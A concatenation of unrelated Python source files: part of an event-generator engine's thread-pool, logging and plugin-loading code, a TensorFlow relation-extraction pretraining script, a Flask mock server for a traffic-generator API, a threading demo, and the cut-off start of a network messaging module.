os.path.join(file_path, 'lib', 'plugins', 'generator'), self.config.plugins, 'generator')
plugins = self._initializePlugins(
os.path.join(file_path, 'lib', 'plugins', 'rater'), self.config.plugins, 'rater')
self.config._complexSettings['rater'] = plugins
except Exception as e:
self.logger.exception(str(e))
def _load_custom_plugins(self, PluginNotLoadedException):
plugintype = PluginNotLoadedException.type
plugin = PluginNotLoadedException.name
bindir = PluginNotLoadedException.bindir
plugindir = PluginNotLoadedException.plugindir
pluginsdict = self.config.plugins if plugintype in ('generator', 'rater') else self.config.outputPlugins
# APPPERF-263: be picky when loading from an app bindir (only load name)
self._initializePlugins(bindir, pluginsdict, plugintype, name=plugin)
# APPPERF-263: be greedy when scanning plugin dir (eat all the pys)
self._initializePlugins(plugindir, pluginsdict, plugintype)
def _setup_pools(self, generator_worker_count):
'''
This method is an internal method called on init to generate pools needed for processing.
:return:
'''
# Load the things that actually do the work.
self._create_generator_pool()
self._create_timer_threadpool()
self._create_output_threadpool()
self._create_generator_workers(generator_worker_count)
def _create_timer_threadpool(self, threadcount=100):
'''
Timer threadpool is used to contain the timer object for each sample. A timer will stay active
until the end condition is met for the sample. If there is no end condition, the timer will exist forever.
:param threadcount: is how many active timers we want to allow inside of eventgen. Default 100. If someone
has over 100 samples, additional samples won't run until the first ones end.
:return:
'''
self.sampleQueue = Queue(maxsize=0)
num_threads = threadcount
for i in range(num_threads):
worker = Thread(target=self._worker_do_work, args=(
self.sampleQueue,
self.loggingQueue,
), name="TimeThread{0}".format(i))
worker.setDaemon(True)
worker.start()
def _create_output_threadpool(self, threadcount=1):
'''
The output thread pool is used for output plugins that need to control file locking, or that only have 1 set thread
to send all the data out of. This FIFO queue just helps make sure there are no file or write collisions.
There's only 1 active thread for this queue; if you're ever considering upping this, don't. Just shut off the
outputQueue and let each generator output its data directly.
:param threadcount: is how many active output threads we want to allow inside of eventgen. Default 1
:return:
'''
# TODO: Make this take the config param and figure out what we want to do with this.
if getattr(self, "manager", None):
self.outputQueue = self.manager.Queue(maxsize=500)
else:
self.outputQueue = Queue(maxsize=500)
num_threads = threadcount
for i in range(num_threads):
worker = Thread(target=self._worker_do_work, args=(
self.outputQueue,
self.loggingQueue,
), name="OutputThread{0}".format(i))
worker.setDaemon(True)
worker.start()
def _create_generator_pool(self, workercount=20):
'''
The generator pool has two main modes: it can run with multiprocessing or with threading. We check the argument
from configuration, and then build the appropriate queue type. Each time a timer runs for a sample, if the
timer says it's time to generate, it will create a new generator plugin object, and place it in this queue.
:param workercount: is how many active workers we want to allow inside of eventgen. Default 20. If someone
has over 20 generators working, additional samples won't run until the first ones end.
:return:
'''
if self.args.multiprocess:
import multiprocessing
self.manager = multiprocessing.Manager()
if self.config.disableLoggingQueue:
self.loggingQueue = None
else:
# TODO crash caused by logging Thread https://github.com/splunk/eventgen/issues/217
self.loggingQueue = self.manager.Queue()
self.logging_pool = Thread(target=self.logger_thread, args=(self.loggingQueue, ), name="LoggerThread")
self.logging_pool.start()
# since we're now in multiprocess, we need to use better queues.
self.workerQueue = multiprocessing.JoinableQueue(maxsize=self._generator_queue_size)
self.genconfig = self.manager.dict()
self.genconfig["stopping"] = False
else:
self.workerQueue = Queue(maxsize=self._generator_queue_size)
worker_threads = workercount
if hasattr(self.config, 'outputCounter') and self.config.outputCounter:
self.output_counters = []
for i in range(workercount):
self.output_counters.append(OutputCounter())
for i in range(worker_threads):
worker = Thread(target=self._generator_do_work, args=(self.workerQueue, self.loggingQueue,
self.output_counters[i]))
worker.setDaemon(True)
worker.start()
else:
for i in range(worker_threads):
worker = Thread(target=self._generator_do_work, args=(self.workerQueue, self.loggingQueue, None))
worker.setDaemon(True)
worker.start()
def _create_generator_workers(self, workercount=20):
if self.args.multiprocess:
import multiprocessing
self.workerPool = []
for worker in xrange(workercount):
# builds a list of tuples to use the map function
process = multiprocessing.Process(target=self._proc_worker_do_work, args=(
self.workerQueue,
self.loggingQueue,
self.genconfig,
))
self.workerPool.append(process)
process.start()
else:
pass
def _setup_loggers(self, args=None, config=None):
log_path = getattr(args, "log_path", os.path.join(file_path, 'logs'))
eventgen_main_logger_path = os.path.join(log_path, 'eventgen-main.log')
eventgen_controller_logger_path = os.path.join(log_path, 'eventgen-controller.log')
eventgen_metrics_logger_path = os.path.join(log_path, 'eventgen-metrics.log')
eventgen_error_logger_path = os.path.join(log_path, 'eventgen-errors.log')
eventgen_server_logger_path = os.path.join(log_path, 'eventgen-server.log')
eventgen_httpevent_logger_path = os.path.join(log_path, 'eventgen-httpevent.log')
if not config:
log_format = '%(asctime)s %(name)-15s %(levelname)-8s %(processName)-10s %(message)s'
date_format = '%Y-%m-%d %H:%M:%S'
# Set up formatter
detailed_formatter = logging.Formatter(log_format, datefmt=date_format)
json_formatter = JSONFormatter(log_format, datefmt=date_format)
# Set up handlers
console_handler = logging.StreamHandler()
console_handler.setFormatter(detailed_formatter)
console_handler.setLevel(logging.DEBUG)
file_handler = logging.handlers.RotatingFileHandler(eventgen_main_logger_path, maxBytes=2500000,
backupCount=20)
file_handler.setFormatter(detailed_formatter)
file_handler.setLevel(logging.DEBUG)
eventgen_controller_file_handler = logging.handlers.RotatingFileHandler(eventgen_controller_logger_path,
maxBytes=2500000, backupCount=20)
eventgen_controller_file_handler.setFormatter(detailed_formatter)
eventgen_controller_file_handler.setLevel(logging.DEBUG)
error_file_handler = logging.handlers.RotatingFileHandler(eventgen_error_logger_path, maxBytes=2500000,
backupCount=20)
error_file_handler.setFormatter(detailed_formatter)
error_file_handler.setLevel(logging.ERROR)
metrics_file_handler = logging.handlers.RotatingFileHandler(eventgen_metrics_logger_path, maxBytes=2500000,
backupCount=20)
metrics_file_handler.setFormatter(json_formatter)
metrics_file_handler.setLevel(logging.INFO)
server_file_handler = logging.handlers.RotatingFileHandler(eventgen_server_logger_path, maxBytes=2500000,
backupCount=10)
server_file_handler.setFormatter(json_formatter)
server_file_handler.setLevel(logging.INFO)
httpevent_file_handler = logging.handlers.RotatingFileHandler(eventgen_httpevent_logger_path, maxBytes=2500000,
backupCount=10)
httpevent_file_handler.setFormatter(detailed_formatter)
httpevent_file_handler.setLevel(logging.INFO)
# Configure eventgen logger
logger = logging.getLogger('eventgen')
logger.setLevel(self.args.verbosity or logging.ERROR)
logger.propagate = False
logger.handlers = []
if args and not args.modinput_mode:
logger.addHandler(console_handler)
logger.addHandler(file_handler)
logger.addHandler(error_file_handler)
# Configure eventgen listener
logger = logging.getLogger('eventgen_controller')
logger.setLevel(self.args.verbosity or logging.ERROR)
logger.propagate = False
logger.handlers = []
logger.addHandler(eventgen_controller_file_handler)
logger.addHandler(error_file_handler)
logger.addHandler(console_handler)
# Configure eventgen metrics logger
logger = logging.getLogger('eventgen_metrics')
logger.setLevel(logging.INFO)
logger.propagate = False
logger.handlers = []
logger.addHandler(metrics_file_handler)
# Configure eventgen server logger
logger = logging.getLogger('eventgen_server')
logger.setLevel(logging.INFO)
logger.propagate = False
logger.handlers = []
logger.addHandler(server_file_handler)
logger.addHandler(console_handler)
# Configure httpeventout logger
logger = logging.getLogger('eventgen_httpeventout')
logger.setLevel(logging.INFO)
logger.propagate = False
logger.handlers = []
logger.addHandler(httpevent_file_handler)
else:
self.logger_config = config
logging.config.dictConfig(self.logger_config)
# We need to have debugv from the older versions of eventgen.
DEBUG_LEVELV_NUM = 9
logging.addLevelName(DEBUG_LEVELV_NUM, "DEBUGV")
def debugv(self, message, *args, **kws):
# Yes, logger takes its '*args' as 'args'.
if self.isEnabledFor(DEBUG_LEVELV_NUM):
self._log(DEBUG_LEVELV_NUM, message, args, **kws)
logging.Logger.debugv = debugv
self.logger = logging.getLogger('eventgen')
self.loggingQueue = None
def _worker_do_work(self, work_queue, logging_queue):
while not self.stopping:
try:
item = work_queue.get(timeout=10)
startTime = time.time()
item.run()
totalTime = time.time() - startTime
if totalTime > self.config.interval and self.config.end != 1:
self.logger.warning("work took longer than current interval, queue/threading throughput limitation")
work_queue.task_done()
except Empty:
pass
except Exception as e:
self.logger.exception(str(e))
raise e
def _generator_do_work(self, work_queue, logging_queue, output_counter=None):
while not self.stopping:
try:
item = work_queue.get(timeout=10)
startTime = time.time()
item.run(output_counter=output_counter)
totalTime = time.time() - startTime
if totalTime > self.config.interval and item._sample.end != 1:
self.logger.warning("work took longer than current interval, queue/threading throughput limitation")
work_queue.task_done()
except Empty:
pass
except Exception as e:
self.logger.exception(str(e))
raise e
@staticmethod
def _proc_worker_do_work(work_queue, logging_queue, config):
genconfig = config
stopping = genconfig['stopping']
root = logging.getLogger()
root.setLevel(logging.DEBUG)
if logging_queue is not None:
# TODO https://github.com/splunk/eventgen/issues/217
qh = logutils.queue.QueueHandler(logging_queue)
root.addHandler(qh)
else:
root.addHandler(logging.StreamHandler())
while not stopping:
try:
root.info("Checking for work")
item = work_queue.get(timeout=10)
item.logger = root
item.config._setup_logging()
item._out.updateConfig(item.config)
item._out._setup_logging()
item.run()
work_queue.task_done()
stopping = genconfig['stopping']
item.logger.debug("Current Worker Stopping: {0}".format(stopping))
except Empty:
stopping = genconfig['stopping']
except Exception as e:
root.exception(e)
raise e
else:
root.info("Stopping Process")
sys.exit(0)
def logger_thread(self, loggingQueue):
while not self.stopping:
try:
record = loggingQueue.get(timeout=10)
logger = logging.getLogger(record.name)
logger.handle(record)
loggingQueue.task_done()
except Empty:
pass
except Exception as e:
self.logger.exception(str(e))
raise e
def _initializePlugins(self, dirname, plugins, plugintype, name=None):
"""Load a python module dynamically and add to internal dictionary of plugins (only accessed by getPlugin)"""
ret = []
syspathset = set(sys.path)
dirname = os.path.abspath(dirname)
self.logger.debug("looking for plugin(s) in {}".format(dirname))
if not os.path.isdir(dirname):
self.logger.debug("directory {} does not exist ... moving on".format(dirname))
return ret
# Include all plugin directories in sys.path for includes
if dirname not in sys.path:
syspathset.add(dirname)
sys.path = list(syspathset)
# Loop through all files in passed dirname looking for plugins
for filename in os.listdir(dirname):
filename = dirname + os.sep + filename
# If the file exists
if os.path.isfile(filename):
# Split file into a base name plus extension
basename = os.path.basename(filename)
base, extension = os.path.splitext(basename)
# If we're a python file and we don't start with _
# if extension == ".py" and not basename.startswith("_"):
# APPPERF-263: If name param is supplied, only attempt to load
# {name}.py from {app}/bin directory
if extension == ".py" and ((name is None and not basename.startswith("_")) or base == name):
self.logger.debug("Searching for plugin in file '%s'" % filename)
try:
# Import the module
# module = imp.load_source(base, filename)
mod_name, mod_path, mod_desc = imp.find_module(base, [dirname])
# TODO: Probably need to adjust module.load() to be added later so this can be pickled.
module = imp.load_module(base, mod_name, mod_path, mod_desc)
plugin = module.load()
# set plugin to something like output.file or generator.default
pluginname = plugintype + '.' + base
# self.logger.debugv("Filename: %s os.sep: %s pluginname: %s" % (filename, os.sep, pluginname))
plugins[pluginname] = plugin
# Return is used to determine valid configs, so only return the base name of the plugin
ret.append(base)
self.logger.debug("Loading module '%s' from '%s'" % (pluginname, basename))
# 12/3/13 If we haven't loaded a plugin right or we haven't initialized all the variables
# in the plugin, we will get an exception and the plan is to not handle it
if 'validSettings' in dir(plugin):
self.config._validSettings.extend(plugin.validSettings)
if 'defaultableSettings' in dir(plugin):
self.config._defaultableSettings.extend(plugin.defaultableSettings)
if 'intSettings' in dir(plugin):
self.config._intSettings.extend(plugin.intSettings)
if 'floatSettings' in dir(plugin):
self.config._floatSettings.extend(plugin.floatSettings)
if 'boolSettings' in dir(plugin):
self.config._boolSettings.extend(plugin.boolSettings)
if 'jsonSettings' in dir(plugin):
self.config._jsonSettings.extend(plugin.jsonSettings)
if 'complexSettings' in dir(plugin):
self.config._complexSettings.update(plugin.complexSettings)
except ValueError:
self.logger.error("Error loading plugin '%s' of type '%s'" % (base, plugintype))
except ImportError as ie:
self.logger.warn("Could not load plugin: %s, skipping" % mod_name.name)
self.logger.exception(ie)
except Exception as e:
self.logger.exception(str(e))
raise e
return ret
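# Hedged sketch (added, not part of eventgen): the deprecated `imp` calls above
# could be expressed with importlib instead, roughly:
#   spec = importlib.util.spec_from_file_location(base, filename)
#   module = importlib.util.module_from_spec(spec)
#   spec.loader.exec_module(module)
#   plugin = module.load()
# The remaining bookkeeping (plugins[pluginname] = plugin, extending the
# valid/defaultable/int/float/bool/json/complex settings) would stay unchanged.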
def start(self, join_after_start=True):
self.stopping = False
self.started = True
self.config.stopping = False
self.completed = False
if len(self.config.samples) <= 0:
self.logger.info("No samples found. Exiting.")
for s in self.config.samples:
if s.interval > 0 or s.mode == 'replay' or s.end != "0":
self.logger.info("Creating timer object for sample '%s' in app '%s'" % (s.name, s.app))
# This is where the timer is finally sent to a queue to be processed. Needs to move to this object.
try:
t = Timer(1.0, sample=s, config=self.config, genqueue=self.workerQueue,
outputqueue=self.outputQueue, loggingqueue=self.loggingQueue)
except PluginNotLoaded as pnl:
self._load_custom_plugins(pnl)
t = Timer(1.0, sample=s, config=self.config, genqueue=self.workerQueue,
outputqueue=self.outputQueue, loggingqueue=self.loggingQueue)
except Exception as e:
raise e
self.sampleQueue.put(t)
if join_after_start:
self.logger.info("All timers started, joining queue until it's empty.")
self.join_process()
def join_process(self):
'''
This method will attach the current object to the queues existing for generation and will call stop after all
generation is complete. If the queue never finishes, this will lock the main process to the child indefinitely.
:return:
'''
try:
while not self.sampleQueue.empty() or self.sampleQueue.unfinished_tasks > 0 or not self.workerQueue.empty():
time.sleep(5)
self.logger.info("All timers have finished, signalling workers to exit.")
self.stop()
except Exception as e:
self.logger.exception(str(e))
raise e
def stop(self):
# empty the sample queue:
self.config.stopping = True
self.stopping = True
self.logger.info("All timers exited, joining generation queue until it's empty.")
self.workerQueue.join()
# if we're in multiprocess, make sure we don't add more generators after the timers stopped.
if self.args.multiprocess:
self.genconfig["stopping"] = True
for worker in self.workerPool:
count = 0
# We wait for a minute until terminating the worker
while worker.exitcode is None:
if count == 30:
self.logger.info("Terminating worker {0}".format(worker._name))
worker.terminate()
count = 0
break
self.logger.info("Worker {0} still working, waiting for it to finish.".format(worker._name))
time.sleep(2)
count += 1
self.logger.info("All generators working/exited, joining output queue until it's empty.")
self.outputQueue.join()
self.logger.info("All items fully processed. Cleaning up internal processes.")
self.started = False
self.stopping = False
def reload_conf(self, configfile):
'''
This method will allow a user to supply a new .conf file for generation and reload the sample files.
:param configfile:
:return:
'''
self._load_config(configfile=configfile)
self.logger.debug("Config File Loading Complete.")
def check_running(self):
'''
:return: if eventgen is running, return True else False
'''
if hasattr(self, "outputQueue") and hasattr(self, "sampleQueue") and hasattr(self, "workerQueue"):
# If all queues are not empty, eventgen is running.
# If all queues are empty and all tasks are finished, eventgen is not running.
# If all queues are empty and there is an unfinished task, eventgen is running.
if self.outputQueue.empty() and self.sampleQueue.empty() and self.workerQueue.empty() \
and self.sampleQueue.unfinished_tasks <= 0 \
and self.outputQueue.unfinished_tasks <= 0 \
and self.workerQueue.unfinished_tasks <= 0:
self.logger.info("Queues are all empty and there are no pending tasks")
return self.started
else:
return True
return False
def check_done(self):
'''
:return: if eventgen jobs are finished, return True else False
'''
return self.sampleQueue.empty() and self.sampleQueue.unfinished_tasks <= 0 and self.workerQueue.empty() and self.workerQueue.unfinished_tasks <= 0
|
train_ug_pretrain.py
|
import tensorflow as tf
import numpy as np
import time
import datetime
import os
import network_pretrain_rank as network
import network_pretrain as network_pre
import json
from sklearn.metrics import average_precision_score
import sys
import ctypes
import threading
from kg_dataset_transe import KnowledgeGraph
export_path = "../nyt10_part1/"
export_path_g = "../nyt10_part1/"
export_path_l = "../nyt10_part2/"
word_vec = np.load(export_path + 'vec.npy')
KG = KnowledgeGraph(export_path)
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_float('nbatch_kg', 200,'entity numbers used each training time')
tf.app.flags.DEFINE_float('margin',1.0,'margin for the knowledge graph embedding loss')
tf.app.flags.DEFINE_float('learning_rate_kg',0.001,'learning rate for kg')
tf.app.flags.DEFINE_integer('rel_total', 1376,'total of relations')
tf.app.flags.DEFINE_integer('katt_flag', 13, 'type of attention')
tf.app.flags.DEFINE_string('model', 'cnn', 'neural models to encode sentences')
tf.app.flags.DEFINE_integer('max_length', 120,'maximum of number of words in one sentence')
tf.app.flags.DEFINE_integer('pos_num', 120 * 2 + 1,'number of position embedding vectors')
tf.app.flags.DEFINE_integer('num_classes', 58,'maximum of relations')
tf.app.flags.DEFINE_integer('hidden_size', 230,'hidden feature size')
tf.app.flags.DEFINE_integer('pos_size', 5,'position embedding size')
#tf.app.flags.DEFINE_integer('max_epoch', 150,'maximum of training epochs')
tf.app.flags.DEFINE_integer('max_epoch', 2,'maximum of training epochs')
tf.app.flags.DEFINE_integer('max_epoch_pre', 1,'maximum of training epochs for pretrain')
tf.app.flags.DEFINE_integer('batch_size', 160,'batch size for training the sentence encoder')
tf.app.flags.DEFINE_float('learning_rate',0.05,'learning rate for nn')
tf.app.flags.DEFINE_float('weight_decay',0.00001,'weight_decay')
tf.app.flags.DEFINE_float('keep_prob',0.5,'dropout rate')
tf.app.flags.DEFINE_string('model_dir','./model/','path to store model')
tf.app.flags.DEFINE_string('summary_dir','./summary','path to store summary_dir')
def complexity_features(array):
return np.array([[np.count_nonzero(ele), np.unique(ele).size] for ele in array]).astype(np.float32)
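# Worked example (comment added for clarity): complexity_features(np.array([[3, 0, 3, 5]]))
# returns array([[3., 3.]], dtype=float32) - 3 non-zero entries and 3 unique values (0, 3, 5).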
def MakeSummary(name, value):
"""Creates a tf.Summary proto with the given name and value."""
summary = tf.Summary()
val = summary.value.add()
val.tag = str(name)
val.simple_value = float(value)
return summary
def make_shape(array,last_dim):
output = []
for i in array:
for j in i:
output.append(j)
output = np.array(output)
if np.shape(output)[-1]==last_dim:
return output
else:
print 'Make Shape Error!'
def main_pretrain(_):
word_vec = np.load(export_path + 'vec.npy')
instance_triple = np.load(export_path + 'train_instance_triple.npy')
instance_scope = np.load(export_path + 'train_instance_scope.npy')
instance_scope_path = np.load(export_path_l + 'train_instance_scope_kg.npy')
instance_scope_path3 = np.load(export_path_l + 'train_instance_scope_tx.npy')
instance_scope_path4 = np.load(export_path_l + 'train_instance_scope_ug.npy')
train_len = np.load(export_path + 'train_len.npy')
train_label = np.load(export_path + 'train_label.npy')
train_word = np.load(export_path + 'train_word.npy')
train_pos1 = np.load(export_path + 'train_pos1.npy')
train_pos2 = np.load(export_path + 'train_pos2.npy')
train_word_cross = np.load(export_path_l + 'train_word_cross_kg.npy')
train_pos1_cross = np.load(export_path_l + 'train_pos1_cross_kg.npy')
train_pos2_cross = np.load(export_path_l + 'train_pos2_cross_kg.npy')
train_word_cross3 = np.load(export_path_l + 'train_word_cross_tx.npy')
train_pos1_cross3 = np.load(export_path_l + 'train_pos1_cross_tx.npy')
train_pos2_cross3 = np.load(export_path_l + 'train_pos2_cross_tx.npy')
train_word_cross4 = np.load(export_path_l + 'train_word_cross_ug.npy')
train_pos1_cross4 = np.load(export_path_l + 'train_pos1_cross_ug.npy')
train_pos2_cross4 = np.load(export_path_l + 'train_pos2_cross_ug.npy')
train_mask = np.load(export_path + 'train_mask.npy')
train_head = np.load(export_path + 'train_head.npy')
train_tail = np.load(export_path + 'train_tail.npy')
reltot = {}
for index, i in enumerate(train_label):
if not i in reltot:
reltot[i] = 1.0
else:
reltot[i] += 1.0
for i in reltot:
reltot[i] = 1/(reltot[i] ** (0.05))
print 'building network...'
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
model = network_pre.CNN(is_training = True, word_embeddings = word_vec)
global_step = tf.Variable(0,name='global_step',trainable=False)
global_step_kg = tf.Variable(0,name='global_step_kg',trainable=False)
tf.summary.scalar('learning_rate', FLAGS.learning_rate)
tf.summary.scalar('learning_rate_kg', FLAGS.learning_rate_kg)
optimizer = tf.train.GradientDescentOptimizer(FLAGS.learning_rate)
grads_and_vars = optimizer.compute_gradients(model.loss)
train_op = optimizer.apply_gradients(grads_and_vars, global_step = global_step)
optimizer_kg = tf.train.GradientDescentOptimizer(FLAGS.learning_rate_kg)
grads_and_vars_kg = optimizer_kg.compute_gradients(model.loss_kg)
train_op_kg = optimizer_kg.apply_gradients(grads_and_vars_kg, global_step = global_step_kg)
merged_summary = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(FLAGS.summary_dir, sess.graph)
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(max_to_keep=None)
batch_size = int(KG.n_triplet / FLAGS.nbatch_kg)
def train_kg(coord):
def train_step_kg(pos_h_batch, pos_t_batch, pos_r_batch, neg_h_batch, neg_t_batch, neg_r_batch):
feed_dict = {
model.pos_h: pos_h_batch,
model.pos_t: pos_t_batch,
model.pos_r: pos_r_batch,
model.neg_h: neg_h_batch,
model.neg_t: neg_t_batch,
model.neg_r: neg_r_batch
}
_, step, loss = sess.run(
[train_op_kg, global_step_kg, model.loss_kg], feed_dict)
return loss
batch_size = int(KG.n_triplet / FLAGS.nbatch_kg)
times_kg = 0
while not coord.should_stop():
times_kg += 1
res = 0.0
pos_batch_gen = KG.next_pos_batch(batch_size)
neg_batch_gen = KG.next_neg_batch(batch_size)
for batchi in range(int(FLAGS.nbatch_kg)):
pos_batch = next(pos_batch_gen)
neg_batch = next(neg_batch_gen)
ph = pos_batch[:, 0]
pt = pos_batch[:, 1]
pr = pos_batch[:, 2]
nh = neg_batch[:, 0]
nt = neg_batch[:, 1]
nr = neg_batch[:, 2]
res += train_step_kg(ph, pt, pr, nh, nt, nr)
time_str = datetime.datetime.now().isoformat()
print "batch %d time %s | loss : %f" % (times_kg, time_str, res)
def train_nn(coord):
def train_step(head, tail, word, pos1, pos2, mask, leng, label_index, label, scope, weights,
word_cr, pos1_cr, pos2_cr, scope_path, head_path, tail_path):
feed_dict = {
model.head_index: head,
model.tail_index: tail,
model.head_index_path: head_path,
model.tail_index_path: tail_path,
model.word: word,
model.pos1: pos1,
model.pos2: pos2,
model.word_cross: word_cr,
model.pos1_cross: pos1_cr,
model.pos2_cross: pos2_cr,
model.mask: mask,
model.len : leng,
model.label_index: label_index,
model.label: label,
model.scope: scope,
model.scope_path: scope_path,
model.keep_prob: FLAGS.keep_prob,
model.weights: weights
}
_, step, loss, summary, output, correct_predictions = sess.run([train_op, global_step, model.loss, merged_summary, model.output, model.correct_predictions], feed_dict)
summary_writer.add_summary(summary, step)
return output, loss, correct_predictions
stack_output = []
stack_label = []
stack_ce_loss = []
train_order = range(len(instance_triple))
save_epoch = 2
eval_step = 300
for one_epoch in range(FLAGS.max_epoch_pre):
print('pretrain epoch '+str(one_epoch+1)+' starts!')
np.random.shuffle(train_order)
s1 = 0.0
s2 = 0.0
tot1 = 0.0
tot2 = 1.0
losstot = 0.0
for i in range(int(len(train_order)/float(FLAGS.batch_size))):
#for i in range(50):
input_scope = np.take(instance_scope, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path = np.take(instance_scope_path, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path3 = np.take(instance_scope_path3, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path4 = np.take(instance_scope_path4, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
index = []
scope = [0]
index_path = []
index_path3 = []
index_path4 = []
scope_path = [0]
scope_path3 = [0]
scope_path4 = [0]
label = []
weights = []
train_head_path = []
train_tail_path = []
train_head_path3 = []
train_tail_path3 = []
train_head_path4 = []
train_tail_path4 = []
for num, num_path, num_path3, num_path4 in zip(input_scope, input_scope_path, input_scope_path3, input_scope_path4):
index = index + range(num[0], num[1] + 1)
label.append(train_label[num[0]])
scope.append(scope[len(scope)-1] + num[1] - num[0] + 1)
weights.append(reltot[train_label[num[0]]])
index_path = index_path + range(num_path[0], num_path[1] + 1)
scope_path.append(scope_path[len(scope_path)-1] + num_path[1] - num_path[0] + 1)
index_path3 = index_path3 + range(num_path3[0], num_path3[1] + 1)
scope_path3.append(scope_path3[len(scope_path3)-1] + num_path3[1] - num_path3[0] + 1)
index_path4 = index_path4 + range(num_path4[0], num_path4[1] + 1)
scope_path4.append(scope_path4[len(scope_path4)-1] + num_path4[1] - num_path4[0] + 1)
train_head_path += [train_head[num[0]]]*len(range(num_path[0], num_path[1] + 1))
train_tail_path += [train_tail[num[0]]]*len(range(num_path[0], num_path[1] + 1))
train_head_path3 += [train_head[num[0]]]*len(range(num_path3[0], num_path3[1] + 1))
train_tail_path3 += [train_tail[num[0]]]*len(range(num_path3[0], num_path3[1] + 1))
train_head_path4 += [train_head[num[0]]]*len(range(num_path4[0], num_path4[1] + 1))
train_tail_path4 += [train_tail[num[0]]]*len(range(num_path4[0], num_path4[1] + 1))
label_ = np.zeros((FLAGS.batch_size, FLAGS.num_classes))
label_[np.arange(FLAGS.batch_size), label] = 1
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross3[index_path3,:], train_pos1_cross3[index_path3,:], train_pos2_cross3[index_path3,:],
np.array(scope_path3), train_head_path3, train_tail_path3)
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross4[index_path4,:], train_pos1_cross4[index_path4,:], train_pos2_cross4[index_path4,:],
np.array(scope_path4), train_head_path4, train_tail_path4)
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross[index_path,:], train_pos1_cross[index_path,:], train_pos2_cross[index_path,:],
np.array(scope_path), train_head_path, train_tail_path)
num = 0
s = 0
losstot += loss
for num in correct_predictions:
if label[s] == 0:
tot1 += 1.0
if num:
s1+= 1.0
else:
tot2 += 1.0
if num:
s2 += 1.0
s = s + 1
time_str = datetime.datetime.now().isoformat()
print "pretrain epoch %d step %d time %s | loss : %f, not NA accuracy: %f" % (one_epoch, i, time_str, loss, s2 / tot2)
current_step = tf.train.global_step(sess, global_step)
if (one_epoch + 1) % save_epoch == 0 and (one_epoch + 1) >= FLAGS.max_epoch_pre:
print 'epoch '+str(one_epoch+1)+' has finished'
print 'saving model...'
path = saver.save(sess,FLAGS.model_dir+'pretrain_' + str(FLAGS.max_epoch_pre))
print 'have saved model to '+path
coord.request_stop()
coord = tf.train.Coordinator()
threads = []
threads.append(threading.Thread(target=train_kg, args=(coord,)))
threads.append(threading.Thread(target=train_nn, args=(coord,)))
for t in threads: t.start()
coord.join(threads)
if __name__ == "__main__":
tf.app.run(main_pretrain)
|
snappiserver.py
|
from flask import Flask, request, Response
import threading
import json
import time
import snappi
app = Flask(__name__)
CONFIG = None
@app.route('/config', methods=['POST'])
def set_config():
global CONFIG
config = snappi.api().config()
config.deserialize(request.data.decode('utf-8'))
test = config.options.port_options.location_preemption
if test is not None and isinstance(test, bool) is False:
return Response(status=590,
response=json.dumps({'detail': 'invalid data type'}),
headers={'Content-Type': 'application/json'})
else:
CONFIG = config
return Response(status=200)
@app.route('/config', methods=['GET'])
def get_config():
global CONFIG
return Response(CONFIG.serialize() if CONFIG is not None else '{}',
mimetype='application/json',
status=200)
@app.route('/control/transmit', methods=['POST'])
def set_transmit_state():
global CONFIG
return Response(status=200)
@app.route('/results/metrics', methods=['POST'])
def get_metrics():
global CONFIG
api = snappi.api()
metrics_request = api.metrics_request()
metrics_request.deserialize(request.data.decode('utf-8'))
metrics_response = api.metrics_response()
if metrics_request.choice == 'port':
for port in CONFIG.ports:
metrics_response.port_metrics.metric(
name=port.name, frames_tx=10000, frames_rx=10000
)
elif metrics_request.choice == 'flow':
for flow in CONFIG.flows:
metrics_response.flow_metrics.metric(
name=flow.name, frames_tx=10000, frames_rx=10000
)
return Response(metrics_response.serialize(),
mimetype='application/json',
status=200)
@app.after_request
def after_request(resp):
print(request.method, request.url, ' -> ', resp.status)
return resp
def web_server():
app.run(port=80, debug=True, use_reloader=False)
class SnappiServer(object):
def __init__(self):
self._CONFIG = None
def start(self):
self._web_server_thread = threading.Thread(target=web_server)
self._web_server_thread.daemon = True
self._web_server_thread.start()
self._wait_until_ready()
return self
def _wait_until_ready(self):
api = snappi.api(location='http://127.0.0.1:80')
while True:
try:
api.get_config()
break
except Exception:
pass
time.sleep(.1)
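# Hedged usage sketch (added, not part of the original file): start the mock
# in-process and poll it with the same snappi client call used in
# _wait_until_ready() above. Like web_server(), it binds port 80, which may
# require elevated privileges.
if __name__ == '__main__':
    mock = SnappiServer().start()
    print(snappi.api(location='http://127.0.0.1:80').get_config())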
|
threadDemo.py
|
import threading, time
print('Start of program.')
def takeANap(): #defines function for use in a new thread
time.sleep(5)
print('Wake up!')
threadObj = threading.Thread(target=takeANap) #calls function in new thread.
threadObj.start()
print('End of program!')
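# Note (added): 'End of program!' prints right away while takeANap() is still
# sleeping in its own thread; to make the main thread wait for it, join it:
#   threadObj.join()  # blocks until takeANap() prints 'Wake up!'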
|
network.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2020 tecnovert
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
'''
Message 2 bytes msg_class, 4 bytes length, [ 2 bytes msg_type, payload ]
Handshake procedure:
node0 connecting to node1
node0 send_handshake
node1 process_handshake
node1 send_ping - With a version field
node0 recv_ping
Both nodes are initialised
XChaCha20_Poly1305 mac is 16 bytes
'''
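# Hedged framing sketch (added, not part of the original module): a minimal
# illustration of the 2-byte start token + 4-byte length layout described above,
# assuming the same big-endian encoding used by Network.send_msg further down.
def _framing_sketch(msg_type: int, payload: bytes) -> bytes:
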